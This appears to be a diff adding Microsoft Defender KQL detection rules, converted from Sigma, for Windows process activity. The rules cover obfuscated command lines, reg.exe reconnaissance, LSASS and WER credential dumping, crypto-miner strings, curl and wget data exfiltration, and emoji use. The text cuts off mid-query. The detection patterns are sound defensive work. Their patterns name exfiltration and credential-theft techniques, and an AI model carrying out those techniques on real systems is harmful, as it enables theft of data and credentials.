+// Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and (ProcessVersionInfoOriginalFileName in~ ("Cmd.EXE", "cscript.exe", "PowerShell.EXE", "PowerShell_ISE.EXE", "pwsh.dll", "wscript.exe"))) and (ProcessCommandLine contains "ˣ" or ProcessCommandLine contains "˪" or ProcessCommandLine contains "ˢ" or ProcessCommandLine contains "∕" or ProcessCommandLine contains "⁄" or ProcessCommandLine contains "―" or ProcessCommandLine contains "—" or ProcessCommandLine contains " " or ProcessCommandLine contains "¯" or ProcessCommandLine contains "®" or ProcessCommandLine contains "¶" or ProcessCommandLine contains "⠀")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_commandline_path_traversal_via_cmd_exe.kql b/KQL/rules/windows/process_creation/potential_commandline_path_traversal_via_cmd_exe.kql
new file mode 100644
index 00000000..7f970e5e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_commandline_path_traversal_via_cmd_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential CommandLine Path Traversal Via Cmd.EXE
+// Author: xknow @xknow_infosec, Tim Shelton
+// Date: 2020-06-11
+// Level: high
+// Description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+// False Positives:
+//   - Java tools are known to produce false-positive when loading libraries
+
+DeviceProcessEvents
+| where (((InitiatingProcessCommandLine contains "/c" or InitiatingProcessCommandLine contains "/k" or InitiatingProcessCommandLine contains "/r") or (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/k" or ProcessCommandLine contains "/r")) and (InitiatingProcessFolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "cmd.exe") and (InitiatingProcessCommandLine =~ "/../../" or ProcessCommandLine contains "/../../")) and (not(ProcessCommandLine contains "\\Tasktop\\keycloak\\bin\\/../../jre\\bin\\java"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_configuration_and_service_reconnaissance_via_reg_exe.kql b/KQL/rules/windows/process_creation/potential_configuration_and_service_reconnaissance_via_reg_exe.kql
new file mode 100644
index 00000000..ce8d5c18
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_configuration_and_service_reconnaissance_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Configuration And Service Reconnaissance Via Reg.EXE
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2019-10-21
+// Level: medium
+// Description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012, attack.t1007
+// False Positives:
+//   - Discord
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "query" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "currentVersion\\windows" or ProcessCommandLine contains "winlogon\\" or ProcessCommandLine contains "currentVersion\\shellServiceObjectDelayLoad" or ProcessCommandLine contains "currentVersion\\run" or ProcessCommandLine contains "currentVersion\\policies\\explorer\\run" or ProcessCommandLine contains "currentcontrolset\\services")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_cookies_session_hijacking.kql b/KQL/rules/windows/process_creation/potential_cookies_session_hijacking.kql
new file mode 100644
index 00000000..04d151e4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_cookies_session_hijacking.kql
@@ -0,0 +1,10 @@
+// Title: Potential Cookies Session Hijacking
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: medium
+// Description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie data.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "\\s-c\\s" or ProcessCommandLine contains "--cookie-jar") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql b/KQL/rules/windows/process_creation/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql
new file mode 100644
index 00000000..c913f200
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql
@@ -0,0 +1,12 @@
+// Title: Potential Credential Dumping Attempt Using New NetworkProvider - CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-23
+// Level: high
+// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+// False Positives:
+//   - Other legitimate network providers used and not filtred in this rule
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Services\\" and ProcessCommandLine contains "\\NetworkProvider"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_credential_dumping_via_lsass_process_clone.kql b/KQL/rules/windows/process_creation/potential_credential_dumping_via_lsass_process_clone.kql
new file mode 100644
index 00000000..6650139b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_credential_dumping_via_lsass_process_clone.kql
@@ -0,0 +1,10 @@
+// Title: Potential Credential Dumping Via LSASS Process Clone
+// Author: Florian Roth (Nextron Systems), Samir Bousseaden
+// Date: 2021-11-27
+// Level: critical
+// Description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003, attack.t1003.001
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Windows\\System32\\lsass.exe" and InitiatingProcessFolderPath endswith "\\Windows\\System32\\lsass.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_credential_dumping_via_wer.kql b/KQL/rules/windows/process_creation/potential_credential_dumping_via_wer.kql
new file mode 100644
index 00000000..a5860a75
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_credential_dumping_via_wer.kql
@@ -0,0 +1,12 @@
+// Title: Potential Credential Dumping Via WER
+// Author: @pbssubhash , Nasreddine Bencherchali
+// Date: 2022-12-08
+// Level: high
+// Description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+//   - Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the "-p" parameter in the CommandLine.
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " -u -p " and ProcessCommandLine contains " -ip " and ProcessCommandLine contains " -s ") and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and (FolderPath endswith "\\Werfault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_crypto_mining_activity.kql b/KQL/rules/windows/process_creation/potential_crypto_mining_activity.kql
new file mode 100644
index 00000000..96f5fa0f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_crypto_mining_activity.kql
@@ -0,0 +1,13 @@
+// Title: Potential Crypto Mining Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-10-26
+// Level: high
+// Description: Detects command line parameters or strings often used by crypto miners
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1496
+// False Positives:
+//   - Legitimate use of crypto miners
+//   - Some build frameworks
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " --cpu-priority=" or ProcessCommandLine contains "--donate-level=0" or ProcessCommandLine contains " -o pool." or ProcessCommandLine contains " --nicehash" or ProcessCommandLine contains " --algo=rx/0 " or ProcessCommandLine contains "stratum+tcp://" or ProcessCommandLine contains "stratum+udp://" or ProcessCommandLine contains "LS1kb25hdGUtbGV2ZWw9" or ProcessCommandLine contains "0tZG9uYXRlLWxldmVsP" or ProcessCommandLine contains "tLWRvbmF0ZS1sZXZlbD" or ProcessCommandLine contains "c3RyYXR1bSt0Y3A6Ly" or ProcessCommandLine contains "N0cmF0dW0rdGNwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3RjcDovL" or ProcessCommandLine contains "c3RyYXR1bSt1ZHA6Ly" or ProcessCommandLine contains "N0cmF0dW0rdWRwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3VkcDovL") and (not((ProcessCommandLine contains " pool.c " or ProcessCommandLine contains " pool.o " or ProcessCommandLine contains "gcc -")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_data_exfiltration_activity_via_commandline_tools.kql b/KQL/rules/windows/process_creation/potential_data_exfiltration_activity_via_commandline_tools.kql
new file mode 100644
index 00000000..e61428b7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_data_exfiltration_activity_via_commandline_tools.kql
@@ -0,0 +1,12 @@
+// Title: Potential Data Exfiltration Activity Via CommandLine Tools
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-02
+// Level: high
+// Description: Detects the use of various CLI utilities exfiltrating data via web requests
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "irm " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and (ProcessCommandLine contains " -ur" and ProcessCommandLine contains " -me" and ProcessCommandLine contains " -b" and ProcessCommandLine contains " POST ") and (FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or ((ProcessCommandLine contains "--ur" and FolderPath endswith "\\curl.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " --data ")) or ((ProcessCommandLine contains "--post-data" or ProcessCommandLine contains "--post-file") and FolderPath endswith "\\wget.exe")) and ((ProcessCommandLine matches regex "net\\s+view" or ProcessCommandLine matches regex "sc\\s+query") or (ProcessCommandLine contains "Get-Content" or ProcessCommandLine contains "GetBytes" or ProcessCommandLine contains "hostname" or ProcessCommandLine contains "ifconfig" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine contains "netstat" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "qprocess" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "ToBase64String" or ProcessCommandLine contains "whoami") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > " and ProcessCommandLine contains " C:\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_data_stealing_via_chromium_headless_debugging.kql b/KQL/rules/windows/process_creation/potential_data_stealing_via_chromium_headless_debugging.kql
new file mode 100644
index 00000000..5da0b829
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_data_stealing_via_chromium_headless_debugging.kql
@@ -0,0 +1,10 @@
+// Title: Potential Data Stealing Via Chromium Headless Debugging
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-23
+// Level: high
+// Description: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.collection, attack.t1185, attack.t1564.003
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--remote-debugging-" and ProcessCommandLine contains "--user-data-dir" and ProcessCommandLine contains "--headless"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql
new file mode 100644
index 00000000..79e8d350
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql
@@ -0,0 +1,10 @@
+// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-12-05
+// Level: high
+// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "😀" or ProcessCommandLine contains "😃" or ProcessCommandLine contains "😄" or ProcessCommandLine contains "😁" or ProcessCommandLine contains "😆" or ProcessCommandLine contains "😅" or ProcessCommandLine contains "😂" or ProcessCommandLine contains "🤣" or ProcessCommandLine contains "🥲" or ProcessCommandLine contains "🥹" or ProcessCommandLine contains "☺️" or ProcessCommandLine contains "😊" or ProcessCommandLine contains "😇" or ProcessCommandLine contains "🙂" or ProcessCommandLine contains "🙃" or ProcessCommandLine contains "😉" or ProcessCommandLine contains "😌" or ProcessCommandLine contains "😍" or ProcessCommandLine contains "🥰" or ProcessCommandLine contains "😘" or ProcessCommandLine contains "😗" or ProcessCommandLine contains "😙" or ProcessCommandLine contains "😚" or ProcessCommandLine contains "😋" or ProcessCommandLine contains "😛" or ProcessCommandLine contains "😝" or ProcessCommandLine contains "😜" or ProcessCommandLine contains "🤪" or ProcessCommandLine contains "🤨" or ProcessCommandLine contains "🧐" or ProcessCommandLine contains "🤓" or ProcessCommandLine contains "😎" or ProcessCommandLine contains "🥸" or ProcessCommandLine contains "🤩" or ProcessCommandLine contains "🥳" or ProcessCommandLine contains "😏" or ProcessCommandLine contains "😒" or ProcessCommandLine contains "😞" or ProcessCommandLine contains "😔" or ProcessCommandLine contains "😟" or ProcessCommandLine contains "😕" or ProcessCommandLine contains "🙁" or ProcessCommandLine contains "☹️" or ProcessCommandLine contains "😣" or ProcessCommandLine contains "😖" or ProcessCommandLine contains "😫" or ProcessCommandLine contains "😩" or ProcessCommandLine contains "🥺" or ProcessCommandLine contains "😢" or ProcessCommandLine contains "😭" or ProcessCommandLine contains "😮‍💨" or ProcessCommandLine contains "😤" or ProcessCommandLine contains "😠" or ProcessCommandLine contains "😡" or ProcessCommandLine contains "🤬" or ProcessCommandLine contains "🤯" or ProcessCommandLine contains "😳" or ProcessCommandLine contains "🥵" or ProcessCommandLine contains "🥶" or ProcessCommandLine contains "😱" or ProcessCommandLine contains "😨" or ProcessCommandLine contains "😰" or ProcessCommandLine contains "😥" or ProcessCommandLine contains "😓" or ProcessCommandLine contains "🫣" or ProcessCommandLine contains "🤗" or ProcessCommandLine contains "🫡" or ProcessCommandLine contains "🤔" or ProcessCommandLine contains "🫢" or ProcessCommandLine contains "🤭" or ProcessCommandLine contains "🤫" or ProcessCommandLine contains "🤥" or ProcessCommandLine contains "😶" or ProcessCommandLine contains "😶‍🌫️" or ProcessCommandLine contains "😐" or ProcessCommandLine contains "😑" or ProcessCommandLine contains "😬" or ProcessCommandLine contains "🫠" or ProcessCommandLine contains "🙄" or ProcessCommandLine contains "😯" or ProcessCommandLine contains "😦" or ProcessCommandLine contains "😧" or ProcessCommandLine contains "😮" or ProcessCommandLine contains "😲" or ProcessCommandLine contains "🥱" or ProcessCommandLine contains "😴" or ProcessCommandLine contains "🤤" or ProcessCommandLine contains "😪" or ProcessCommandLine contains "😵" or ProcessCommandLine contains "😵‍💫" or ProcessCommandLine contains "🫥" or ProcessCommandLine contains "🤐" or ProcessCommandLine contains "🥴" or ProcessCommandLine contains "🤢" or ProcessCommandLine contains "🤮" or ProcessCommandLine contains "🤧" or ProcessCommandLine contains "😷" or ProcessCommandLine contains "🤒" or ProcessCommandLine contains "🤕" or ProcessCommandLine contains "🤑" or ProcessCommandLine contains "🤠" or ProcessCommandLine contains "😈" or ProcessCommandLine contains "👿" or ProcessCommandLine contains "👹" or ProcessCommandLine contains "👺" or ProcessCommandLine contains "🤡" or ProcessCommandLine contains "💩" or ProcessCommandLine contains "👻" or ProcessCommandLine contains "💀" or ProcessCommandLine contains "☠️" or ProcessCommandLine contains "👽" or ProcessCommandLine contains "👾" or ProcessCommandLine contains "🤖" or ProcessCommandLine contains "🎃" or ProcessCommandLine contains "😺" or ProcessCommandLine contains "😸" or ProcessCommandLine contains "😹" or ProcessCommandLine contains "😻" or ProcessCommandLine contains "😼" or ProcessCommandLine contains "😽" or ProcessCommandLine contains "🙀" or ProcessCommandLine contains "😿" or ProcessCommandLine contains "😾" or ProcessCommandLine contains "👋" or ProcessCommandLine contains "🤚" or ProcessCommandLine contains "🖐" or ProcessCommandLine contains "✋" or ProcessCommandLine contains "🖖" or ProcessCommandLine contains "👌" or ProcessCommandLine contains "🤌" or ProcessCommandLine contains "🤏" or ProcessCommandLine contains "✌️" or ProcessCommandLine contains "🤞" or ProcessCommandLine contains "🫰" or ProcessCommandLine contains "🤟" or ProcessCommandLine contains "🤘" or ProcessCommandLine contains "🤙" or ProcessCommandLine contains "🫵" or ProcessCommandLine contains "🫱" or ProcessCommandLine contains "🫲" or ProcessCommandLine contains "🫳" or ProcessCommandLine contains "🫴" or ProcessCommandLine contains "👈" or ProcessCommandLine contains "👉" or ProcessCommandLine contains "👆" or ProcessCommandLine contains "🖕" or ProcessCommandLine contains "👇" or ProcessCommandLine contains "☝️" or ProcessCommandLine contains "👍" or ProcessCommandLine contains "👎" or ProcessCommandLine contains "✊" or ProcessCommandLine contains "👊" or ProcessCommandLine contains "🤛" or ProcessCommandLine contains "🤜" or ProcessCommandLine contains "👏" or ProcessCommandLine contains "🫶" or ProcessCommandLine contains "🙌" or ProcessCommandLine contains "👐" or ProcessCommandLine contains "🤲" or ProcessCommandLine contains "🤝" or ProcessCommandLine contains "🙏" or ProcessCommandLine contains "✍️" or ProcessCommandLine contains "💪" or ProcessCommandLine contains "🦾" or ProcessCommandLine contains "🦵" or ProcessCommandLine contains "🦿" or ProcessCommandLine contains "🦶" or ProcessCommandLine contains "👣" or ProcessCommandLine contains "👂" or ProcessCommandLine contains "🦻" or ProcessCommandLine contains "👃" or ProcessCommandLine contains "🫀" or ProcessCommandLine contains "🫁" or ProcessCommandLine contains "🧠" or ProcessCommandLine contains "🦷" or ProcessCommandLine contains "🦴" or ProcessCommandLine contains "👀" or ProcessCommandLine contains "👁" or ProcessCommandLine contains "👅" or ProcessCommandLine contains "👄" or ProcessCommandLine contains "🫦" or ProcessCommandLine contains "💋" or ProcessCommandLine contains "🩸" or ProcessCommandLine contains "👶" or ProcessCommandLine contains "👧" or ProcessCommandLine contains "🧒" or ProcessCommandLine contains "👦" or ProcessCommandLine contains "👩" or ProcessCommandLine contains "🧑" or ProcessCommandLine contains "👨" or ProcessCommandLine contains "👩‍🦱" or ProcessCommandLine contains "🧑‍🦱" or ProcessCommandLine contains "👨‍🦱" or ProcessCommandLine contains "👩‍🦰" or ProcessCommandLine contains "🧑‍🦰" or ProcessCommandLine contains "👨‍🦰" or ProcessCommandLine contains "👱‍♀️" or ProcessCommandLine contains "👱" or ProcessCommandLine contains "👱‍♂️" or ProcessCommandLine contains "👩‍🦳" or ProcessCommandLine contains "🧑‍🦳" or ProcessCommandLine contains "👨‍🦳" or ProcessCommandLine contains "👩‍🦲" or ProcessCommandLine contains "🧑‍🦲" or ProcessCommandLine contains "👨‍🦲" or ProcessCommandLine contains "🧔‍♀️" or ProcessCommandLine contains "🧔" or ProcessCommandLine contains "🧔‍♂️" or ProcessCommandLine contains "👵" or ProcessCommandLine contains "🧓" or ProcessCommandLine contains "👴" or ProcessCommandLine contains "👲" or ProcessCommandLine contains "👳‍♀️" or ProcessCommandLine contains "👳" or ProcessCommandLine contains "👳‍♂️" or ProcessCommandLine contains "🧕" or ProcessCommandLine contains "👮‍♀️" or ProcessCommandLine contains "👮" or ProcessCommandLine contains "👮‍♂️" or ProcessCommandLine contains "👷‍♀️" or ProcessCommandLine contains "👷" or ProcessCommandLine contains "👷‍♂️" or ProcessCommandLine contains "💂‍♀️" or ProcessCommandLine contains "💂" or ProcessCommandLine contains "💂‍♂️" or ProcessCommandLine contains "🕵️‍♀️" or ProcessCommandLine contains "🕵️" or ProcessCommandLine contains "🕵️‍♂️" or ProcessCommandLine contains "👩‍⚕️" or ProcessCommandLine contains "🧑‍⚕️" or ProcessCommandLine contains "👨‍⚕️" or ProcessCommandLine contains "👩‍🌾" or ProcessCommandLine contains "🧑‍🌾" or ProcessCommandLine contains "👨‍🌾" or ProcessCommandLine contains "👩‍🍳" or ProcessCommandLine contains "🧑‍🍳" or ProcessCommandLine contains "👨‍🍳" or ProcessCommandLine contains "👩‍🎓" or ProcessCommandLine contains "🧑‍🎓" or ProcessCommandLine contains "👨‍🎓" or ProcessCommandLine contains "👩‍🎤" or ProcessCommandLine contains "🧑‍🎤" or ProcessCommandLine contains "👨‍🎤" or ProcessCommandLine contains "👩‍🏫" or ProcessCommandLine contains "🧑‍🏫" or ProcessCommandLine contains "👨‍🏫" or ProcessCommandLine contains "👩‍🏭" or ProcessCommandLine contains "🧑‍🏭" or ProcessCommandLine contains "👨‍🏭" or ProcessCommandLine contains "👩‍💻" or ProcessCommandLine contains "🧑‍💻" or ProcessCommandLine contains "👨‍💻" or ProcessCommandLine contains "👩‍💼" or ProcessCommandLine contains "🧑‍💼" or ProcessCommandLine contains "👨‍💼" or ProcessCommandLine contains "👩‍🔧" or ProcessCommandLine contains "🧑‍🔧" or ProcessCommandLine contains "👨‍🔧" or ProcessCommandLine contains "👩‍🔬" or ProcessCommandLine contains "🧑‍🔬" or ProcessCommandLine contains "👨‍🔬" or ProcessCommandLine contains "👩‍🎨" or ProcessCommandLine contains "🧑‍🎨" or ProcessCommandLine contains "👨‍🎨" or ProcessCommandLine contains "👩‍🚒" or ProcessCommandLine contains "🧑‍🚒" or ProcessCommandLine contains "👨‍🚒" or ProcessCommandLine contains "👩‍✈️" or ProcessCommandLine contains "🧑‍✈️" or ProcessCommandLine contains "👨‍✈️" or ProcessCommandLine contains "👩‍🚀" or ProcessCommandLine contains "🧑‍🚀" or ProcessCommandLine contains "👨‍🚀" or ProcessCommandLine contains "👩‍⚖️" or ProcessCommandLine contains "🧑‍⚖️" or ProcessCommandLine contains "👨‍⚖️" or ProcessCommandLine contains "👰‍♀️" or ProcessCommandLine contains "👰" or ProcessCommandLine contains "👰‍♂️" or ProcessCommandLine contains "🤵‍♀️" or ProcessCommandLine contains "🤵" or ProcessCommandLine contains "🤵‍♂️" or ProcessCommandLine contains "👸" or ProcessCommandLine contains "🫅" or ProcessCommandLine contains "🤴" or ProcessCommandLine contains "🥷" or ProcessCommandLine contains "🦸‍♀️" or ProcessCommandLine contains "🦸" or ProcessCommandLine contains "🦸‍♂️" or ProcessCommandLine contains "🦹‍♀️" or ProcessCommandLine contains "🦹" or ProcessCommandLine contains "🦹‍♂️" or ProcessCommandLine contains "🤶" or ProcessCommandLine contains "🧑‍🎄" or ProcessCommandLine contains "🎅" or ProcessCommandLine contains "🧙‍♀️" or ProcessCommandLine contains "🧙" or ProcessCommandLine contains "🧙‍♂️" or ProcessCommandLine contains "🧝‍♀️" or ProcessCommandLine contains "🧝" or ProcessCommandLine contains "🧝‍♂️" or ProcessCommandLine contains "🧛‍♀️" or ProcessCommandLine contains "🧛" or ProcessCommandLine contains "🧛‍♂️" or ProcessCommandLine contains "🧟‍♀️" or ProcessCommandLine contains "🧟" or ProcessCommandLine contains "🧟‍♂️" or ProcessCommandLine contains "🧞‍♀️" or ProcessCommandLine contains "🧞" or ProcessCommandLine contains "🧞‍♂️" or ProcessCommandLine contains "🧜‍♀️" or ProcessCommandLine contains "🧜" or ProcessCommandLine contains "🧜‍♂️" or ProcessCommandLine contains "🧚‍♀️" or ProcessCommandLine contains "🧚" or ProcessCommandLine contains "🧚‍♂️" or ProcessCommandLine contains "🧌" or ProcessCommandLine contains "👼" or ProcessCommandLine contains "🤰" or ProcessCommandLine contains "🫄" or ProcessCommandLine contains "🫃" or ProcessCommandLine contains "🤱" or ProcessCommandLine contains "👩‍🍼" or ProcessCommandLine contains "🧑‍🍼" or ProcessCommandLine contains "👨‍🍼" or ProcessCommandLine contains "🙇‍♀️" or ProcessCommandLine contains "🙇" or ProcessCommandLine contains "🙇‍♂️" or ProcessCommandLine contains "💁‍♀️" or ProcessCommandLine contains "💁" or ProcessCommandLine contains "💁‍♂️" or ProcessCommandLine contains "🙅‍♀️" or ProcessCommandLine contains "🙅" or ProcessCommandLine contains "🙅‍♂️" or ProcessCommandLine contains "🙆‍♀️" or ProcessCommandLine contains "🙆" or ProcessCommandLine contains "🙆‍♂️" or ProcessCommandLine contains "🙋‍♀️" or ProcessCommandLine contains "🙋" or ProcessCommandLine contains "🙋‍♂️" or ProcessCommandLine contains "🧏‍♀️" or ProcessCommandLine contains "🧏" or ProcessCommandLine contains "🧏‍♂️" or ProcessCommandLine contains "🤦‍♀️" or ProcessCommandLine contains "🤦" or ProcessCommandLine contains "🤦‍♂️" or ProcessCommandLine contains "🤷‍♀️" or ProcessCommandLine contains "🤷" or ProcessCommandLine contains "🤷‍♂️" or ProcessCommandLine contains "🙎‍♀️" or ProcessCommandLine contains "🙎" or ProcessCommandLine contains "🙎‍♂️" or ProcessCommandLine contains "🙍‍♀️" or ProcessCommandLine contains "🙍" or ProcessCommandLine contains "🙍‍♂️" or ProcessCommandLine contains "💇‍♀️" or ProcessCommandLine contains "💇" or ProcessCommandLine contains "💇‍♂️" or ProcessCommandLine contains "💆‍♀️" or ProcessCommandLine contains "💆" or ProcessCommandLine contains "💆‍♂️" or ProcessCommandLine contains "🧖‍♀️" or ProcessCommandLine contains "🧖" or ProcessCommandLine contains "🧖‍♂️" or ProcessCommandLine contains "💅" or ProcessCommandLine contains "💃" or ProcessCommandLine contains "🕺" or ProcessCommandLine contains "👯‍♀️" or ProcessCommandLine contains "👯" or ProcessCommandLine contains "👯‍♂️" or ProcessCommandLine contains "🕴" or ProcessCommandLine contains "👩‍🦽" or ProcessCommandLine contains "🧑‍🦽" or ProcessCommandLine contains "👨‍🦽" or ProcessCommandLine contains "👩‍🦼" or ProcessCommandLine contains "🧑‍🦼" or ProcessCommandLine contains "👨‍🦼" or ProcessCommandLine contains "🚶‍♀️" or ProcessCommandLine contains "🚶" or ProcessCommandLine contains "🚶‍♂️" or ProcessCommandLine contains "👩‍🦯" or ProcessCommandLine contains "🧑‍🦯" or ProcessCommandLine contains "👨‍🦯" or ProcessCommandLine contains "🧎‍♀️" or ProcessCommandLine contains "🧎" or ProcessCommandLine contains "🧎‍♂️" or ProcessCommandLine contains "🏃‍♀️" or ProcessCommandLine contains "🏃" or ProcessCommandLine contains "🏃‍♂️" or ProcessCommandLine contains "🧍‍♀️" or ProcessCommandLine contains "🧍" or ProcessCommandLine contains "🧍‍♂️" or ProcessCommandLine contains "👭" or ProcessCommandLine contains "🧑‍🤝‍🧑" or ProcessCommandLine contains "👬" or ProcessCommandLine contains "👫" or ProcessCommandLine contains "👩‍❤️‍👩" or ProcessCommandLine contains "💑" or ProcessCommandLine contains "👨‍❤️‍👨" or ProcessCommandLine contains "👩‍❤️‍👨" or ProcessCommandLine contains "👩‍❤️‍💋‍👩" or ProcessCommandLine contains "💏" or ProcessCommandLine contains "👨‍❤️‍💋‍👨" or ProcessCommandLine contains "👩‍❤️‍💋‍👨" or ProcessCommandLine contains "👪" or ProcessCommandLine contains "👨‍👩‍👦" or ProcessCommandLine contains "👨‍👩‍👧" or ProcessCommandLine contains "👨‍👩‍👧‍👦" or ProcessCommandLine contains "👨‍👩‍👦‍👦" or ProcessCommandLine contains "👨‍👩‍👧‍👧" or ProcessCommandLine contains "👨‍👨‍👦" or ProcessCommandLine contains "👨‍👨‍👧" or ProcessCommandLine contains "👨‍👨‍👧‍👦" or ProcessCommandLine contains "👨‍👨‍👦‍👦" or ProcessCommandLine contains "👨‍👨‍👧‍👧" or ProcessCommandLine contains "👩‍👩‍👦" or ProcessCommandLine contains "👩‍👩‍👧" or ProcessCommandLine contains "👩‍👩‍👧‍👦" or ProcessCommandLine contains "👩‍👩‍👦‍👦" or ProcessCommandLine contains "👩‍👩‍👧‍👧" or ProcessCommandLine contains "👨‍👦" or ProcessCommandLine contains "👨‍👦‍👦" or ProcessCommandLine contains "👨‍👧" or ProcessCommandLine contains "👨‍👧‍👦" or ProcessCommandLine contains "👨‍👧‍👧" or ProcessCommandLine contains "👩‍👦" or ProcessCommandLine contains "👩‍👦‍👦" or ProcessCommandLine contains "👩‍👧" or ProcessCommandLine contains "👩‍👧‍👦" or ProcessCommandLine contains "👩‍👧‍👧" or ProcessCommandLine contains "🗣" or ProcessCommandLine contains "👤" or ProcessCommandLine contains "👥" or ProcessCommandLine contains "🫂" or ProcessCommandLine contains "🧳" or ProcessCommandLine contains "🌂" or ProcessCommandLine contains "☂️" or ProcessCommandLine contains "🧵" or ProcessCommandLine contains "🪡" or ProcessCommandLine contains "🪢" or ProcessCommandLine contains "🧶" or ProcessCommandLine contains "👓" or ProcessCommandLine contains "🕶" or ProcessCommandLine contains "🥽" or ProcessCommandLine contains "🥼" or ProcessCommandLine contains "🦺" or ProcessCommandLine contains "👔" or ProcessCommandLine contains "👕" or ProcessCommandLine contains "👖" or ProcessCommandLine contains "🧣" or ProcessCommandLine contains "🧤" or ProcessCommandLine contains "🧥" or 